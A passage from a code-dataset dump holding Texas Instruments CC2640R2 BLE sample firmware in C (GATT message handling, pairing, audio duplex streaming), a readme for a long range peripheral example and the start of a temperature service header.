Application main loop\n for (;;)\n {\n uint32_t events;\n\n // Waits for an event to be posted associated with the calling thread.\n // Note that an event associated with a thread is posted when a\n // message is queued to the message receive queue of the thread\n\n events = Event_pend(syncEvent, Event_Id_NONE, SBP_ALL_EVENTS,\n ICALL_TIMEOUT_FOREVER);\n\n if (events)\n {\n ICall_EntityID dest;\n ICall_ServiceEnum src;\n ICall_HciExtEvt *pMsg = NULL;\n\n // Fetch any available messages that might have been sent from the stack\n if (ICall_fetchServiceMsg(&src, &dest,\n (void **)&pMsg) == ICALL_ERRNO_SUCCESS)\n {\n uint8 safeToDealloc = TRUE;\n\n if ((src == ICALL_SERVICE_CLASS_BLE) && (dest == selfEntity))\n {\n ICall_Stack_Event *pEvt = (ICall_Stack_Event *)pMsg;\n\n // Check for BLE stack events first\n if (pEvt->signature == 0xffff)\n {\n if (pEvt->event_flag & SBP_CONN_EVT_END_EVT)\n {\n // Try to retransmit pending ATT Response (if any)\n SimpleBLEPeripheral_sendAttRsp();\n }\n }\n else\n {\n // Process inter-task message\n safeToDealloc = SimpleBLEPeripheral_processStackMsg((ICall_Hdr *)pMsg);\n }\n }\n\n if (pMsg && safeToDealloc)\n {\n ICall_freeMsg(pMsg);\n }\n }\n // If RTOS queue is not empty, process app message.\n if (events & SBP_QUEUE_EVT)\n {\n while (!Queue_empty(appMsgQueue))\n {\n sbpEvt_t *pMsg = (sbpEvt_t *)Util_dequeueMsg(appMsgQueue);\n if (pMsg)\n {\n // Process message.\n SimpleBLEPeripheral_processAppMsg(pMsg);\n\n // Free the space from the message.\n ICall_free(pMsg);\n }\n }\n }\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_processStackMsg\n *\n * @brief Process an incoming stack message.\n *\n * @param pMsg - message to process\n *\n * @return TRUE if safe to deallocate incoming message, FALSE otherwise.\n */\nstatic uint8_t SimpleBLEPeripheral_processStackMsg(ICall_Hdr *pMsg)\n{\n uint8_t safeToDealloc = TRUE;\n\n switch (pMsg->event)\n {\n case GATT_MSG_EVENT:\n // Process GATT message\n safeToDealloc = SimpleBLEPeripheral_processGATTMsg((gattMsgEvent_t *)pMsg);\n break;\n\n case HCI_GAP_EVENT_EVENT:\n {\n // Process HCI message\n switch(pMsg->status)\n {\n case HCI_COMMAND_COMPLETE_EVENT_CODE:\n // Process HCI Command Complete Event\n break;\n\n default:\n break;\n }\n }\n break;\n\n default:\n // do nothing\n break;\n }\n\n return (safeToDealloc);\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_processGATTMsg\n *\n * @brief Process GATT messages and events.\n *\n * @return TRUE if safe to deallocate incoming message, FALSE otherwise.\n */\nstatic uint8_t SimpleBLEPeripheral_processGATTMsg(gattMsgEvent_t *pMsg)\n{\n if (state == BLE_STATE_CONNECTED)\n {\n // See if GATT server was unable to transmit an ATT response\n if (pMsg->hdr.status == blePending)\n {\n // No HCI buffer was available. App can try to retransmit the response\n // on the next connection event. 
Drop it for now.\n Display_print1(dispHandle, 4, 0, \"ATT Rsp dropped %d\", pMsg->method);\n };\n\n switch ( pMsg->method )\n {\n case ATT_HANDLE_VALUE_NOTI:\n // Check to see if notification is from audio data or control char\n if (pMsg->msg.handleValueNoti.handle == audioDataCharValueHandle)\n {\n AudioDuplex_audioData pData;\n pData.len = pMsg->msg.handleValueNoti.len;\n pData.pValue = pMsg->msg.handleValueNoti.pValue;\n AudioDuplex_processData(AudioDuplex_data, &pData);\n }\n else if (pMsg->msg.handleValueNoti.handle == audioStartCharValueHandle)\n {\n AudioDuplex_audioData pData;\n pData.len = pMsg->msg.handleValueNoti.len;\n pData.pValue = pMsg->msg.handleValueNoti.pValue;\n AudioDuplex_processData(AudioDuplex_start_stop, &pData);\n }\n break;\n\n case ATT_FIND_BY_TYPE_VALUE_RSP:\n // Response from GATT_DiscPrimaryServiceByUUID\n // Service found, store handles\n if ( pMsg->msg.findByTypeValueRsp.numInfo > 0 )\n {\n svcStartHdl =\n ATT_ATTR_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n svcEndHdl =\n ATT_GRP_END_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n }\n // If procedure complete\n else if ( pMsg->hdr.status == bleProcedureComplete )\n {\n if ( svcStartHdl != 0 )\n {\n if ( serviceToDiscover == AUDIO_SERV_UUID)\n {\n // Discover all characteristics\n GATT_DiscAllChars( connHandle, svcStartHdl, svcEndHdl, selfEntity );\n }\n\n }\n }\n break;\n\n case ATT_ERROR_RSP:\n\n if (serviceToDiscover == AUDIO_SERV_UUID\n && pMsg->msg.errorRsp.reqOpcode == ATT_FIND_BY_TYPE_VALUE_REQ\n && pMsg->msg.errorRsp.handle == 0x0001)\n //0x0001 is the start attribute handle of 0xfff0, AUDIO_SERV_UUID\n {\n if ( (enableCCCDs == TRUE) && (audioStartCharValueHandle != GATT_INVALID_HANDLE))\n {\n audioStartCCCHandle = audioStartCharValueHandle + 1;\n // Begin configuring the characteristics for notifications\n SimpleBLEPeripheral_EnableNotification( connHandle, audioStartCCCHandle );\n }\n }\n break;\n\n case ATT_READ_BY_TYPE_RSP:\n // Response from Discover all Characteristics.\n // Success indicates packet with characteristic discoveries.\n if ( pMsg->hdr.status == SUCCESS )\n {\n attReadByTypeRsp_t *pRsp = &pMsg->msg.readByTypeRsp;\n\n if( serviceToDiscover == AUDIO_SERV_UUID )\n {\n uint16 charUUID = GATT_INVALID_HANDLE;\n uint16 *pHandle = &charUUID;\n /* Write into charUUID what Audio Profile char value we're dealing with */\n *pHandle = BUILD_UINT16( pRsp->pDataList[17] , pRsp->pDataList[18]);\n if (charUUID == AUDIOPROFILE_START_UUID) {\n pHandle = &audioStartCharValueHandle;\n *pHandle = BUILD_UINT16( pRsp->pDataList[3] , pRsp->pDataList[4]);\n }\n else if (charUUID == AUDIOPROFILE_AUDIO_UUID ){\n pHandle = &audioDataCharValueHandle;\n *pHandle = BUILD_UINT16( pRsp->pDataList[3] , pRsp->pDataList[4]);\n }\n }\n break;\n }\n\n // This indicates that there is no more characteristic data\n // to be discovered within the given handle range.\n else if ( pMsg->hdr.status == bleProcedureComplete )\n {\n if ( serviceToDiscover == AUDIO_SERV_UUID )\n {\n /* This kicks off the enabling the 1st of notification enable event */\n if (audioStartCharValueHandle != GATT_INVALID_HANDLE) {\n audioStartCCCHandle = audioStartCharValueHandle + 1 ;\n SimpleBLEPeripheral_EnableNotification( connHandle, audioStartCCCHandle );\n }\n break;\n }\n\n }\n break;\n\n case ATT_WRITE_RSP:\n if ( pMsg->hdr.status == SUCCESS && !serviceDiscComplete )\n {\n uint16 handle = GATT_INVALID_HANDLE;\n\n // Chain the CCCD enable writes so that a RSP for one triggers the next enable.\n if (audioDataCCCHandle == 
GATT_INVALID_HANDLE) {\n handle = audioDataCCCHandle = audioDataCharValueHandle + 1;\n }\n else {\n serviceDiscComplete = TRUE;\n break;\n }\n\n SimpleBLEPeripheral_EnableNotification( connHandle, handle );\n\n break;\n\n }\n\n break;\n\n\n\n // Service Change indication\n case ATT_HANDLE_VALUE_IND:\n // Note: this logic assumes that the only indications that will be sent\n // will come from the GATT Service Changed Characteristic\n if ( pMsg->hdr.status == SUCCESS )\n {\n\n // Acknowledge receipt of indication\n ATT_HandleValueCfm( pMsg->connHandle );\n\n }\n break;\n\n default:\n // Unknown event\n break;\n } //switch\n } // end of connected-state handling; a GATT message arriving after the connection dropped is ignored.\n // Needed only for ATT Protocol messages\n GATT_bm_free(&pMsg->msg, pMsg->method);\n\n // It's safe to free the incoming message\n return (TRUE);\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_sendAttRsp\n *\n * @brief Send a pending ATT response message.\n *\n * @param none\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_sendAttRsp(void)\n{\n // See if there's a pending ATT Response to be transmitted\n if (pAttRsp != NULL)\n {\n uint8_t status;\n\n // Increment retransmission count\n rspTxRetry++;\n\n // Try to retransmit ATT response till either we're successful or\n // the ATT Client times out (after 30s) and drops the connection.\n status = GATT_SendRsp(pAttRsp->connHandle, pAttRsp->method, &(pAttRsp->msg));\n if ((status != blePending) && (status != MSG_BUFFER_NOT_AVAIL))\n {\n // Disable connection event end notice\n HCI_EXT_ConnEventNoticeCmd(pAttRsp->connHandle, selfEntity, 0);\n\n // We're done with the response message\n SimpleBLEPeripheral_freeAttRsp(status);\n }\n else\n {\n // Continue retrying\n Display_print1(dispHandle, 5, 0, \"Rsp send retry: %d\", rspTxRetry);\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_freeAttRsp\n *\n * @brief Free ATT response message.\n *\n * @param status - response transmit status\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_freeAttRsp(uint8_t status)\n{\n // See if there's a pending ATT response message\n if (pAttRsp != NULL)\n {\n // See if the response was sent out successfully\n if (status == SUCCESS)\n {\n Display_print1(dispHandle, 5, 0, \"Rsp sent retry: %d\", rspTxRetry);\n }\n else\n {\n // Free response payload\n GATT_bm_free(&pAttRsp->msg, pAttRsp->method);\n\n Display_print1(dispHandle, 5, 0, \"Rsp retry failed: %d\", rspTxRetry);\n }\n\n // Free response message\n ICall_freeMsg(pAttRsp);\n\n // Reset our globals\n pAttRsp = NULL;\n rspTxRetry = 0;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_processAppMsg\n *\n * @brief Process an incoming application message.\n *\n * @param pMsg - message to process\n *\n * @return None.\n */\nstatic void SimpleBLEPeripheral_processAppMsg(sbpEvt_t *pMsg)\n{\n switch (pMsg->hdr.event)\n {\n case SBP_STATE_CHANGE_EVT:\n {\n SimpleBLEPeripheral_processStateChangeEvt((gaprole_States_t)pMsg->\n hdr.state);\n break;\n }\n\n case SBP_KEY_CHANGE_EVT:\n {\n SimpleBLEPeripheral_handleKeys(0, pMsg->hdr.state);\n break;\n }\n\n // Pairing event\n case SBP_PAIRING_STATE_EVT:\n {\n SimpleBLEPeripheral_processPairState(pMsg->hdr.state, *pMsg->pData);\n\n ICall_free(pMsg->pData);\n break;\n }\n\n // Passcode event\n case SBP_PASSCODE_NEEDED_EVT:\n {\n 
SimpleBLEPeripheral_processPasscode(*pMsg->pData);\n\n ICall_free(pMsg->pData);\n break;\n }\n case SBP_AUDIO_EVT:\n {\n AudioDuplex_eventHandler(pMsg->hdr.state);\n break;\n }\n\n default:\n // Do nothing.\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_stateChangeCB\n *\n * @brief Callback from GAP Role indicating a role state change.\n *\n * @param newState - new state\n *\n * @return None.\n */\nstatic void SimpleBLEPeripheral_stateChangeCB(gaprole_States_t newState)\n{\n SimpleBLEPeripheral_enqueueMsg(SBP_STATE_CHANGE_EVT, newState, 0);\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_processStateChangeEvt\n *\n * @brief Process a pending GAP Role state change event.\n *\n * @param newState - new state\n *\n * @return None.\n */\nstatic void SimpleBLEPeripheral_processStateChangeEvt(gaprole_States_t newState)\n{\n switch ( newState )\n {\n case GAPROLE_STARTED:\n {\n uint8_t ownAddress[B_ADDR_LEN];\n\n GAPRole_GetParameter(GAPROLE_BD_ADDR, ownAddress);\n\n // Display device address\n Display_print0(dispHandle, 1, 0, Util_convertBdAddr2Str(ownAddress));\n Display_print0(dispHandle, 2, 0, \"Initialized\");\n }\n break;\n\n case GAPROLE_ADVERTISING:\n Display_print0(dispHandle, 2, 0, \"Advertising\");\n break;\n\n case GAPROLE_CONNECTED:\n {\n state = BLE_STATE_CONNECTED;\n\n uint8_t peerAddress[B_ADDR_LEN];\n\n GAPRole_GetParameter(GAPROLE_CONN_BD_ADDR, peerAddress);\n\n GAPRole_GetParameter(GAPROLE_CONNHANDLE, &connHandle);\n\n AudioDuplex_setConnectionHandle(connHandle);\n\n Display_print0(dispHandle, 2, 0, \"Connected\");\n Display_print0(dispHandle, 3, 0, Util_convertBdAddr2Str(peerAddress));\n\n if (FALSE == serviceDiscComplete)\n {\n // Begin Service Discovery of AUDIO Service to find out report handles\n serviceToDiscover = AUDIO_SERV_UUID;\n SimpleBLEPeripheral_DiscoverService( connHandle, serviceToDiscover );\n }\n\n }\n break;\n\n case GAPROLE_CONNECTED_ADV:\n Display_print0(dispHandle, 2, 0, \"Connected Advertising\");\n break;\n\n case GAPROLE_WAITING:\n Util_stopClock(&periodicClock);\n SimpleBLEPeripheral_freeAttRsp(bleNotConnected);\n\n Display_print0(dispHandle, 2, 0, \"Disconnected\");\n\n serviceDiscComplete = FALSE;\n\n audioStartCharValueHandle = GATT_INVALID_HANDLE;\n audioStartCCCHandle = GATT_INVALID_HANDLE;\n audioDataCharValueHandle = GATT_INVALID_HANDLE;\n audioDataCCCHandle = GATT_INVALID_HANDLE;\n\n AudioDuplex_stopStreaming();\n\n // Clear remaining lines\n Display_clearLines(dispHandle, 3, 5);\n break;\n\n case GAPROLE_WAITING_AFTER_TIMEOUT:\n SimpleBLEPeripheral_freeAttRsp(bleNotConnected);\n\n Display_print0(dispHandle, 2, 0, \"Timed Out\");\n\n serviceDiscComplete = FALSE;\n\n audioStartCharValueHandle = GATT_INVALID_HANDLE;\n audioStartCCCHandle = GATT_INVALID_HANDLE;\n audioDataCharValueHandle = GATT_INVALID_HANDLE;\n audioDataCCCHandle = GATT_INVALID_HANDLE;\n\n AudioDuplex_stopStreaming();\n\n // Clear remaining lines\n Display_clearLines(dispHandle, 3, 5);\n break;\n\n case GAPROLE_ERROR:\n Display_print0(dispHandle, 2, 0, \"Error\");\n break;\n\n default:\n Display_clearLine(dispHandle, 2);\n break;\n }\n\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_keyChangeHandler\n *\n * @brief Key event handler function\n *\n * @param keys - bit field of pressed keys\n *\n * @return none\n */\nvoid SimpleBLEPeripheral_keyChangeHandler(uint8 keys)\n{\n 
SimpleBLEPeripheral_enqueueMsg(SBP_KEY_CHANGE_EVT, keys, NULL);\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_enqueueMsg\n *\n * @brief Creates a message and puts it in the RTOS queue.\n *\n * @param event - message event.\n * @param state - message state.\n *\n * @return None.\n */\nstatic uint8_t SimpleBLEPeripheral_enqueueMsg(uint8_t event, uint8_t state,\n uint8_t *pData)\n{\n sbpEvt_t *pMsg = ICall_malloc(sizeof(sbpEvt_t));\n\n // Create dynamic pointer to message.\n if (pMsg)\n {\n pMsg->hdr.event = event;\n pMsg->hdr.state = state;\n pMsg->pData = pData;\n\n // Enqueue the message.\n return Util_enqueueMsg(appMsgQueue, syncEvent, (uint8_t *)pMsg);\n }\n\n return FALSE;\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_handleKeys\n *\n * @brief Handles all key events for this device.\n *\n * @param shift - true if in shift/alt.\n * @param keys - bit field for key events. Valid entries:\n * KEY_LEFT\n * KEY_RIGHT\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_handleKeys(uint8_t shift, uint8_t keys)\n{\n static uint8_t previousKeys = 0;\n uint16_t connectionHandle = AudioDuplex_getConnectionHandle();\n\n // Only process changes in keys pressed\n if (keys != previousKeys)\n {\n if(connectionHandle != INVALID_CONNHANDLE && linkDB_Up(connectionHandle))\n {\n // Check for both keys first\n if (keys == (KEY_LEFT | KEY_RIGHT))\n {\n // Start chain of events to stop stream\n AudioDuplex_stopStreaming();\n }\n else if (keys & KEY_LEFT)\n {\n AudioDuplex_startStreaming(AUDIO_DUPLEX_STREAM_TYPE_MSBC);\n }\n else if (keys & KEY_RIGHT)\n {\n AudioDuplex_startStreaming(AUDIO_DUPLEX_STREAM_TYPE_ADPCM);\n }\n }\n else\n {\n Display_print0(dispHandle, 2, 0, \"Connection required for stream\");\n }\n }\n previousKeys = keys;\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_pairStateCB\n *\n * @brief Pairing state callback.\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_pairStateCB(uint16_t connHandle, uint8_t state,\n uint8_t status)\n{\n uint8_t *pData;\n // Allocate space for the event data.\n if ((pData = ICall_malloc(sizeof(uint8_t))))\n {\n *pData = status;\n // Queue the event.\n SimpleBLEPeripheral_enqueueMsg(SBP_PAIRING_STATE_EVT, state, pData);\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_processPairState\n *\n * @brief Process the new pairing state.\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_processPairState(uint8_t state, uint8_t status)\n{\n Display_clearLines(dispHandle, 5, 5);\n switch (state)\n {\n case GAPBOND_PAIRING_STATE_STARTED:\n Display_print0(dispHandle, 2, 0, \"Pairing started\");\n break;\n\n case GAPBOND_PAIRING_STATE_COMPLETE:\n if (status == SUCCESS)\n {\n // Enter a GAP Bond manager Paired state\n Display_print0(dispHandle, 2, 0, \"Pairing success\");\n\n if (FALSE == serviceDiscComplete)\n {\n // Begin Service Discovery of AUDIO Service to find out report handles\n serviceToDiscover = AUDIO_SERV_UUID;\n SimpleBLEPeripheral_DiscoverService( connHandle, serviceToDiscover );\n }\n }\n else\n {\n Display_print1(dispHandle, 2, 0, \"Pairing fail: %d\", status);\n }\n break;\n\n case GAPBOND_PAIRING_STATE_BOND_SAVED:\n if (status == SUCCESS)\n {\n Display_print0(dispHandle, 2, 0, \"Bond Saved\");\n }\n break;\n\n case GAPBOND_PAIRING_STATE_BONDED:\n if (status == SUCCESS)\n {\n\n if (\n ( 
remoteHandles.audioStartCharValueHandle == GATT_INVALID_HANDLE ) ||\n ( remoteHandles.audioDataCharValueHandle == GATT_INVALID_HANDLE )\n )\n {\n\n serviceDiscComplete = FALSE;\n serviceToDiscover = AUDIO_SERV_UUID;\n\n // We must perform service discovery again, something might have changed.\n // Begin Service Discovery\n SimpleBLEPeripheral_DiscoverService( connHandle, serviceToDiscover );\n\n }\n else\n {\n // No change, restore handle info.\n // bonding indicates that we probably already enabled all these characteristics. easy fix if not.\n serviceDiscComplete = TRUE;\n\n audioStartCharValueHandle = remoteHandles.audioStartCharValueHandle;\n audioDataCharValueHandle = remoteHandles.audioDataCharValueHandle;\n\n }\n\n Display_print0(dispHandle, 2, 0, \"Bond save success\");\n }\n else\n {\n Display_print1(dispHandle, 2, 0, \"Bond save failed: %d\", status);\n }\n break;\n\n default:\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_passcodeCB\n *\n * @brief Passcode callback.\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_passcodeCB(uint8_t *deviceAddr, uint16_t connHandle,\n uint8_t uiInputs, uint8_t uiOutputs)\n{\n uint8_t *pData;\n\n // Allocate space for the passcode event.\n if ((pData = ICall_malloc(sizeof(uint8_t))))\n {\n *pData = uiOutputs;\n\n // Enqueue the event.\n SimpleBLEPeripheral_enqueueMsg(SBP_PASSCODE_NEEDED_EVT, 0, pData);\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_processPasscode\n *\n * @brief Process the Passcode request.\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_processPasscode(uint8_t uiOutputs)\n{\n // This app uses a default passcode. A real-life scenario would handle all\n // pairing scenarios and likely generate this randomly.\n uint32_t passcode = B_APP_DEFAULT_PASSCODE;\n\n // Display passcode to user\n if (uiOutputs != 0)\n {\n Display_print1(dispHandle, 4, 0, \"Passcode: %d\", passcode);\n }\n\n uint16_t connectionHandle;\n GAPRole_GetParameter(GAPROLE_CONNHANDLE, &connectionHandle);\n\n // Send passcode response\n GAPBondMgr_PasscodeRsp(connectionHandle, SUCCESS, passcode);\n}\n\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_DiscoverService\n *\n * @brief Discover service using UUID.\n *\n * @param connHandle - connection handle to do discovery on\n * @param svcUuid - service UUID to discover\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_DiscoverService( uint16 connHandle, uint16 svcUuid )\n{\n if(svcUuid == AUDIO_SERV_UUID) // only take care of Audio Service in this project\n {\n uint8 uuid[16] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB0,\n 0x00, 0x40, 0x51, 0x04, LO_UINT16( svcUuid ), HI_UINT16( svcUuid ), 0x00, 0xF0};\n\n VOID GATT_DiscPrimaryServiceByUUID( connHandle, uuid, ATT_UUID_SIZE, selfEntity );\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_EnableNotification\n *\n * @brief Enable notification for a given attribute handle.\n *\n * @param connHandle - connection handle to send notification on\n * @param attrHandle - attribute handle to send notification for\n *\n * @return none\n */\nstatic void SimpleBLEPeripheral_EnableNotification( uint16 connHandle, uint16 attrHandle )\n{\n attWriteReq_t req;\n\n req.pValue = GATT_bm_alloc( connHandle, ATT_WRITE_REQ, 2, NULL );\n if ( req.pValue != NULL )\n {\n uint8 notificationsOn[] = {0x01, 0x00};\n\n 
req.handle = attrHandle;\n\n req.len = 2;\n memcpy(req.pValue, notificationsOn, 2);\n\n req.sig = 0;\n req.cmd = 0;\n\n if ( GATT_WriteCharValue( connHandle, &req, selfEntity ) != SUCCESS )\n {\n GATT_bm_free( (gattMsg_t *)&req, ATT_WRITE_REQ );\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_setEvent\n *\n * @brief Function to set an event in the Simple BLE Peripheral task.\n *\n * @param newEvents - events to set.\n *\n * @return None.\n */\nvoid SimpleBLEPeripheral_setEvent(uint8_t newEvents)\n{\n SimpleBLEPeripheral_enqueueMsg(SBP_AUDIO_EVT, newEvents, NULL);\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_clearEvent\n *\n * @brief Function to clear events in the Simple BLE Peripheral task.\n *\n * @param clearEvents - events to clear.\n *\n * @return None.\n */\nvoid SimpleBLEPeripheral_clearEvent(uint16_t clearEvents)\n{\n // No locally tracked events to clear in this application.\n}\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_isConnected\n *\n * @brief Function to check whether the peripheral is in a connected state.\n *\n * @param None.\n *\n * @return TRUE if connected, FALSE if not.\n */\nuint8_t SimpleBLEPeripheral_isConnected(void)\n{\n uint8_t gapRoleState;\n GAPRole_GetParameter(GAPROLE_STATE, &gapRoleState);\n\n return (gapRoleState == GAPROLE_CONNECTED);\n}\n\n/*********************************************************************\n *********************************************************************/\n"
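For reference, the 128-bit UUID that `SimpleBLEPeripheral_DiscoverService()` builds above is TI's vendor base UUID (F000xxxx-0451-4000-B000-000000000000) in little-endian byte order, with the 16-bit service UUID spliced into bytes 12 and 13. A minimal standalone sketch of that construction; the helper name `buildTIBaseUuid` is illustrative and not part of the sample:

```c
#include <stdint.h>
#include <string.h>

/* Build the little-endian 128-bit TI base UUID for a 16-bit service UUID,
 * mirroring the byte layout used in SimpleBLEPeripheral_DiscoverService(). */
static void buildTIBaseUuid(uint16_t svcUuid, uint8_t uuid[16])
{
    static const uint8_t tiBase[16] =
    {
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB0,  /* ...-B000-000000000000 */
        0x00, 0x40, 0x51, 0x04, 0x00, 0x00, 0x00, 0xF0   /* F000xxxx-0451-4000-... */
    };

    memcpy(uuid, tiBase, sizeof(tiBase));
    uuid[12] = (uint8_t)(svcUuid & 0xFF);  /* LO_UINT16(svcUuid) */
    uuid[13] = (uint8_t)(svcUuid >> 8);    /* HI_UINT16(svcUuid) */
}
```

Passing 0xFFF0 (the audio service) through this helper yields the same byte array the discovery routine hard-codes.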
},
{
"alpha_fraction": 0.7746220827102661,
"alphanum_fraction": 0.7938616871833801,
"avg_line_length": 42.65999984741211,
"blob_id": "ca752d5c2aaef44a2959fa7e7d7de53ab6509495",
"content_id": "01d4e55ded468e496399b33298e73b8e37043c9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2183,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 50,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_peripheral/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "# BLE5-Stack Long Range Peripheral\n\n## Functional Overview\n\nThis example page will demonstrate the Bluetooth™ 5 Long Range\ncapabilities of the Texas Instruments CC2640R2 SDK's BLE5-Stack.\n\nThis project is a modified Simple Peripheral sample application from the\nBLE5-Stack component of the SDK.\n\nThis list contains the changes from the standard Simple Peripheral example:\n- Removed the Simple GATT Profile\n- Added Support for a custom profile called Throughput Profile\n- Added Support for a custom profile called Temperature Profile\n - Based on the [Sensor Tag's Temperature profile](http://processors.wiki.ti.com/index.php/CC2650_SensorTag_User's_Guide#IR_Temperature_Sensors)\n\nThe Long Range Peripheral is intended to be a head-less device that can used\nwith a USB-powered battery pack to evaluate range capabilities. All the control\nfunctions are handled by the Long Range Central device. Once connected, the\nCentral instructs the Peripheral to negotiate the use of the Coded PHY at which\nthe device will update the LED status and start gather temperature data.\nSimilarly, when the Central enables notifications on the Temperature Profile's\nData Characteristic, the peripheral will send the temperature data to the\ncentral at a 1s interval. Once the connection is dropped or terminated, the\nperipheral must be moved within the range of a 1M PHY.\n\n## Project Hardware\n- 1 CC2650R2 Launchpad\n\n### LED Output\n\n- RED: Solid RED indicates the device is not connected to a central.\n- GREEN: Blinking GREEN indicates the device is connected to a central in\n using the Long Range Coded PHY (S8).\n\n### Two Button Menu\n\nThe Two Button Menu system is designed to utilize the two push buttons available\non the CC2640R2 Launchpad. The left button (BTN1) is always used to cycle\nbetween options. The right button (BTN2) is used to activate the selected action\nor item.\n\nThe Two Button Menu is set up by default to utilize the back channel UART\npresent on the Launchpad as it's display.\n\n### Running the Demo\n\n1. Compile and load the projects:\n - First build and load `ble5_longrange_peripheral_cc2640r2lp_stack`\n - Next build and load `ble5_longrange_peripheral_cc2640r2lp_app`\n"
},
{
"alpha_fraction": 0.6147661805152893,
"alphanum_fraction": 0.6278917193412781,
"avg_line_length": 31.078947067260742,
"blob_id": "b247eafa97d2cb7ea8dfebc29e875ec5aead86ea",
"content_id": "eefab5299dc1e5d2072066c7282f67d69d198bab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 6095,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 190,
"path": "/source/ti/ble5stack/profiles/temperature/temperature_service.h",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (c) 2017, Texas Instruments Incorporated\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n */\n/*!\n * @file Temperature_Service.h\n *\n * @brief Custom TI GATT service to read temperature sensor data.\n *\n * This service defines the following Characterisics:\n *\n * Characteristic Name | UUID | Length | Purpose\n * ------------------- | ------ | ------ | -------\n * Data | 0xAA01 | 4 | Object[0:7], Object[8:15], Ambience[0:7], Ambience[8:15]\n * Config | 0xAA02 | 1 | Write 0x01 to enable data collection, 0x00 to disable.\n * Period | 0xAA03 | 1 | Resolution 10 ms. Range 300 ms (0x1E) to 2.55 sec (0xFF). Default 1 second (0x64)\n */\n\n#ifndef _TEMPERATURE_SERVICE_H_\n#define _TEMPERATURE_SERVICE_H_\n\n#include \"bcomdef.h\"\n\n#ifdef __cplusplus\nextern \"C\"\n{\n#endif\n\n/*********************************************************************\n * INCLUDES\n */\n\n/*********************************************************************\n * CONSTANTS\n */\n\n/*********************************************************************\n * TYPEDEFS\n */\ntypedef struct Temperature_Service_Data_t\n{\n uint8_t objectLowByte;\n uint8_t objectHighByte;\n uint8_t ambienceLowByte;\n uint8_t ambienceHighByte;\n} Temperature_Service_Data;\n\n/*********************************************************************\n* CONSTANTS\n*/\n/*! 
